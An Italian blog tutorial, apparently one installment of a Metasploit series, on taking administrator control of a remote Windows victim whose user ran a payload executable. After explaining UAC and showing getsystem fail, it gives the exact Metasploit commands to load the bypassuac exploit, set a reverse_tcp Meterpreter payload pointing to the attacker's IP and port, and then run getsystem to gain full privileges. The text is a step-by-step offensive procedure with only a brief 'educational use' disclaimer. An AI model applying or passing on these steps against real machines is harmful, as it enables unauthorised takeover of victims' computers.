fbpx

Meterpreter Privilege Escalation – Privilegi di amministrazione su PC Windows remoto

N.B.: Tutte le informazioni contenute nel seguente articolo sono a scopo esclusivamente didattico, pertanto l’autore non si riterrà responsabile dell’abuso di tali informazioni da parte degli utenti del sito, qualora esse venissero utilizzate per scopi illegali.

Abbiamo concluso con successo tutti i passaggi della prima guida della rubrica su Metasploit Framework, guadagnando l’accesso alla macchina Windows bersaglio mediante una sessione di Meterpreter e lanciato il comando sysinfo per ottenere qualche informazione utile sulla vittima. Abbiamo già un ottimo livello di controllo sul nostro target, ma provando ad eseguire qualche operazione su di esso ci siamo accorti che non abbiamo sufficienti privilegi per svolgerle.

Windows, infatti, come la maggior parte dei sistemi operativi, prevede vari tipi di utente. I due più importanti sono l’utente standard, quello che viene utilizzato per le operazioni più comuni, come la lettura e la modifica di file e l’utilizzo normale di programmi, e l’utente amministratore, a cui sono riservati i compiti più delicati, come l’installazione e la rimozione di applicazioni e la modifica di file protetti e di sistema.

Con ogni probabilità, la vittima che ha cliccato sull’eseguibile che conteneva il payload, dandoci l’accesso al suo PC, era un utente standard, motivo per il quale anche la sessione di Meterpreter che si è aperta ha gli stessi privilegi e non ci consente, per esempio, di modificare il registro di sistema del bersaglio. Possiamo averne la riprova lanciando il comando getuid . Come si può notare nell’immagine che segue, l’output è nome_pc\nome_utente.

Meterpreter getuid - Utente standard

Meterpreter dispone di uno script chiamato getsystem, che permette di sorpassare le autorizzazioni imposte dall’utente standard, dando alla sessione i privilegi di amministrazione sul sistema. Microsoft dal canto suo, da Windows Vista in poi, si difende con UAC (User Account Control), un modulo software che impedisce agli utenti non autorizzati di installare ed eseguire software, specialmente quello dannoso, modificare o addirittura danneggiare dati e parti del sistema, rendendolo completamente inutilizzabile. Se proviamo a usare il comando getsystem sul target, infatti, otteniamo il seguente output:

Meterpreteer getsystem fail

Nulla di fatto.

Bypassare lo User Account Control – Bypass UAC

Mettiamo in background la sessione corrente di Meterpreter, lasciandola attiva, per avere la possibilità di configurare un’altro exploit, con il comando (indovinate un po’) background e tramite l’output di quest’ultimo ricaviamo l’ID della sessione

Meterpreter sessione in background

Impostiamo il nuovo exploit con i seguenti comandi, che ci permetteranno di aggirare UAC ottenendo una nuova sessione di Meterpreter

    1. use exploit/windows/local/bypassuac
    1. set PAYLOAD windows/meterpreter/reverse_tcp
    1. set LHOST [indirizzo_ip_macchina_attaccante]
    1. set LPORT [porta_di_connessione_payload]
    1. set SESSION [id_sessione_in_background]
  1. run

Meterpreter - Bypass UAC

Privilege escalation con getsystem

Dalla nuova sessione possiamo prendere il controllo totale della macchina infettata, tramite il comando getsystem

L’output di getuid ci darà ulteriore conferma dei nostri privilegi di amministrazione

Meterpreter getsystem

Grazie a Baty’s Base per l’Articolo!

Lascia un commento

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *